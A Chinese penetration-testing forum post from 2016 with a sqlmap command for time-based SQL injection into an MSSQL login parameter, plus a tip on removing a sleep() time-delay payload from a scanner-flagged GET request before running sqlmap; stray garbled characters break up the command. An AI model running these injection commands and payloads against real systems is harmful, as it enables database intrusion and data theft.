中国网络渗透测试联盟
标题:
sqlmap遇到延时注入的注入命令
[打印本页]
作者:
admin
时间:
2016-4-14 15:52
标题:
sqlmap遇到延时注入的注入命令
E:\sqlmapp2>sqlmap.py -r bao/who.txt -p txtUserName --dbms=mssql --technique=S -
& b& c5 K& Z* P/ Z+ u) e3 Z
-current-db -v 3 --level 4
( P. T# x) `' b0 V: H4 p* p$ w
/ t/ Z+ U1 ~5 O3 |! U/ ] y* `
不加参数注入检测不到注入点,尝试各种方法都不行,这里要提醒一下大家,用WVS扫描到的延时注入一定要改包,把wait for那部分删除掉然后再注入,比如:
GET /view/Statistic/Http_Host.php?category=if(now()=sysdate()%2Csleep(6)%2C0)&device=&pagecur=0 HTTP/1.1,必须把
category=if(now()=sysdate()%2Csleep(6)%2C0)改为category=1然后再注入,否则识别不了注入。特别是category=空,无法识别注入,记得-p category
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2